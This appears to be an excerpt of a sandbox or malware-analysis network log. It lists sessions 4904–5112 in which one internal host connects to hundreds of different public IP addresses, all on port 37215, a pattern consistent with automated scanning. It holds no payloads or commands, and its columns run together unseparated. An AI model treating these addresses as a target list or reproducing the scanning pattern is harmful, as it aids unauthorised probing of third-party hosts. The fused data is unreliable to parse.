                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4904192.168.2.1536084157.224.137.17037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4905192.168.2.155632641.53.185.15437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4906192.168.2.1553066157.112.22.9437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4907192.168.2.1533390209.141.152.20437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4908192.168.2.153480041.133.169.12237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4909192.168.2.1545030157.231.148.8437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4910192.168.2.1535122197.127.140.19537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4911192.168.2.1553884203.156.3.16937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4912192.168.2.1539662197.226.182.2937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4913192.168.2.1559934157.31.76.4837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4914192.168.2.1540100204.253.211.23237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4915192.168.2.1537418197.26.93.4837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4916192.168.2.1547248157.42.223.24137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4917192.168.2.15470621.229.116.12337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4918192.168.2.1560740204.50.159.7837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4919192.168.2.1554848157.98.77.3037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4920192.168.2.1536172157.133.62.737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4921192.168.2.155659441.193.29.22937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4922192.168.2.1534288157.245.0.9437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4923192.168.2.1539216157.124.83.8137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4924192.168.2.1537390157.16.157.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4925192.168.2.1542630197.41.241.12737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4926192.168.2.1559602157.200.149.3037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4927192.168.2.1555678157.51.81.5737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4928192.168.2.153652067.21.131.6737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4929192.168.2.1555842145.41.77.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4930192.168.2.1559910157.23.145.17037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4931192.168.2.154925241.91.78.21837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4932192.168.2.1547206154.27.201.24337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4933192.168.2.1543506116.112.47.9037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4934192.168.2.155606241.132.82.16937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4935192.168.2.1544356194.112.108.14737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4936192.168.2.1538262157.231.158.23437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4937192.168.2.1555840197.115.18.9937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4938192.168.2.1551338197.120.80.637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4939192.168.2.1559050185.155.127.14437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4940192.168.2.1545584157.8.45.14337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4941192.168.2.155662241.9.160.17637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4942192.168.2.155678841.175.5.10337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4943192.168.2.154784241.142.150.3637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4944192.168.2.154669641.225.182.1637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4945192.168.2.1540872186.104.249.6537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4946192.168.2.155975061.60.194.10837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4947192.168.2.1538404197.183.218.23437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4948192.168.2.1534742197.253.129.20337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4949192.168.2.155254241.109.227.13837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4950192.168.2.1539492157.166.83.23037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4951192.168.2.155709659.104.252.15437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4952192.168.2.1544098197.33.98.23037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4953192.168.2.1558084197.15.250.23237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4954192.168.2.154951641.223.89.1137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4955192.168.2.1559212197.76.215.8937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4956192.168.2.155850839.18.28.18437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4957192.168.2.154050637.140.146.5937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4958192.168.2.1558958157.223.69.9837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4959192.168.2.1540816157.120.182.9537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4960192.168.2.1552064143.75.155.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4961192.168.2.1548674157.124.199.1437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4962192.168.2.154906241.238.219.18337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4963192.168.2.1544874197.144.199.7337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4964192.168.2.1536142104.226.36.14137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4965192.168.2.154585441.40.250.20637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4966192.168.2.154439241.29.219.19037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4967192.168.2.1538296197.134.232.24937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4968192.168.2.1560420157.107.95.4937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4969192.168.2.1534954157.185.96.13837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4970192.168.2.155992441.156.15.4537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4971192.168.2.1539650157.140.62.3237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4972192.168.2.155920641.9.26.1337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4973192.168.2.1553478157.128.14.9637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4974192.168.2.1536086197.180.10.9137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4975192.168.2.155615641.54.249.14837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4976192.168.2.1559738157.182.57.16237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4977192.168.2.1549018197.141.112.4937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4978192.168.2.1555310185.94.240.13637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4979192.168.2.1539722197.200.158.9337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4980192.168.2.1550672157.201.156.10737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4981192.168.2.155255641.104.212.14837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4982192.168.2.155704241.228.168.12637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4983192.168.2.154377241.130.20.037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4984192.168.2.155566241.38.150.17137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4985192.168.2.1543376197.89.251.18837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4986192.168.2.1558172197.188.136.21037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4987192.168.2.155005041.236.100.9237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4988192.168.2.1534858197.239.126.19637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4989192.168.2.155651638.174.76.4537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4990192.168.2.154541641.50.71.3337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4991192.168.2.1532814157.57.83.1437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4992192.168.2.1557666197.155.25.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4993192.168.2.153869441.102.53.15737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4994192.168.2.1560960178.165.144.22737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4995192.168.2.1542260197.69.4.19537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4996192.168.2.153929841.246.135.14437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4997192.168.2.156033441.96.56.14037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4998192.168.2.1557746197.81.219.23837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4999192.168.2.154522641.61.230.25137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5000192.168.2.153935641.184.79.9737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5001192.168.2.1546706157.164.209.12937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5002192.168.2.1549282197.17.136.4037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5003192.168.2.154849441.117.184.20937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5004192.168.2.1536322188.18.244.21937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5005192.168.2.1547286175.155.76.9137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5006192.168.2.153466841.138.136.5537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5007192.168.2.1537718192.144.146.24837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5008192.168.2.1549404125.155.147.25437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5009192.168.2.1539192197.230.56.21937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5010192.168.2.155620841.59.211.9037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5011192.168.2.1553484157.106.7.18837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5012192.168.2.1551790197.48.224.14737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5013192.168.2.1539742157.166.165.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5014192.168.2.153698041.198.4.17037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5015192.168.2.1559016105.172.57.23137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5016192.168.2.1541986197.142.101.3737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5017192.168.2.1532884197.133.203.17237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5018192.168.2.1533042197.164.46.18037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5019192.168.2.154512041.120.41.13737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5020192.168.2.155973641.7.245.9637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5021192.168.2.153742841.204.215.4037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5022192.168.2.1548836199.231.201.18437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5023192.168.2.1533774197.16.23.3137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5024192.168.2.1551766166.226.119.10637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5025192.168.2.1549316197.14.231.737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5026192.168.2.1537792157.65.224.8937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5027192.168.2.155856241.175.143.3337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5028192.168.2.153427241.200.88.10337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5029192.168.2.1547506176.46.32.22437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5030192.168.2.1535502163.48.17.19437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5031192.168.2.1534424157.104.217.23037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5032192.168.2.1558066197.213.89.2937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5033192.168.2.1552464197.165.106.16837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5034192.168.2.1538216197.44.60.737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5035192.168.2.154763641.68.253.1537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5036192.168.2.1536984197.24.73.20737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5037192.168.2.154998841.84.181.11637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5038192.168.2.154457441.173.194.22537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5039192.168.2.1536002157.143.114.8537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5040192.168.2.1550664197.127.68.15137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5041192.168.2.155548441.151.168.3537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5042192.168.2.154323841.158.111.18437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5043192.168.2.1552070197.71.147.15737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5044192.168.2.155563841.247.207.8537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5045192.168.2.154354066.173.200.19337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5046192.168.2.1545302197.160.173.23437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5047192.168.2.154745420.254.3.16637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5048192.168.2.155527441.49.116.17037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5049192.168.2.1551530157.147.209.11737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5050192.168.2.1557146157.118.72.8837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5051192.168.2.153308841.41.47.23137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5052192.168.2.1550548157.127.219.15037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5053192.168.2.1550288197.202.91.22537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5054192.168.2.1560052197.166.224.25037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5055192.168.2.1555526197.39.97.23037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5056192.168.2.153432641.121.207.12337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5057192.168.2.15377762.85.214.1737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5058192.168.2.154158239.76.97.18037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5059192.168.2.1549546157.93.45.3837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5060192.168.2.1536248157.147.90.9937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5061192.168.2.1553588157.151.175.8137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5062192.168.2.1533812157.168.202.22437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5063192.168.2.155093441.32.74.6937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5064192.168.2.1553366197.104.57.24237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5065192.168.2.1542364103.109.53.15637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5066192.168.2.1543754105.212.98.9537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5067192.168.2.1533936197.100.104.22637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5068192.168.2.154804072.65.27.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5069192.168.2.1543822129.112.254.8537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5070192.168.2.1560754157.83.243.22937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5071192.168.2.154301241.97.170.6137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5072192.168.2.1548506197.120.156.13937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5073192.168.2.1550180157.229.203.4937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5074192.168.2.154129241.207.56.10337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5075192.168.2.1542102197.199.71.1137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5076192.168.2.156058641.156.36.4637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5077192.168.2.154471841.150.118.21737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5078192.168.2.154124683.131.74.23637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5079192.168.2.155206631.239.81.21537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5080192.168.2.1538058157.249.160.23937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5081192.168.2.153979497.45.113.4237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5082192.168.2.1550298197.194.192.537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5083192.168.2.1548792157.105.83.2737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5084192.168.2.1549306157.34.30.17437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5085192.168.2.153530625.191.168.3137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5086192.168.2.156054441.194.142.8937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5087192.168.2.1550294197.78.123.2937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5088192.168.2.153556441.128.249.5937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5089192.168.2.155690841.86.217.13637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5090192.168.2.153539241.245.25.13337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5091192.168.2.1540684160.226.16.20737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5092192.168.2.155854618.19.238.22537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5093192.168.2.1542954157.196.64.11737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5094192.168.2.1554446197.251.77.20637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5095192.168.2.1541828157.220.123.20837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5096192.168.2.1536308136.20.209.5137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5097192.168.2.154875241.54.14.10037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5098192.168.2.155408641.80.35.13337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5099192.168.2.1559068156.106.215.14637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5100192.168.2.1533830183.68.88.22437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5101192.168.2.154374435.127.187.8137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5102192.168.2.156092241.15.227.11937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5103192.168.2.155217041.1.149.1537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5104192.168.2.153885041.207.117.3137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5105192.168.2.1547012197.70.253.4937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5106192.168.2.154858841.109.218.24437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5107192.168.2.156069277.230.168.9537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5108192.168.2.153474240.60.29.7737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5109192.168.2.1551188110.66.52.7137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5110192.168.2.1543630212.241.164.837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5111192.168.2.154098241.94.100.18937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5112192.168.2.1558032197.189.175.14837215
                                                          TimestampBytes transferredDirectionData


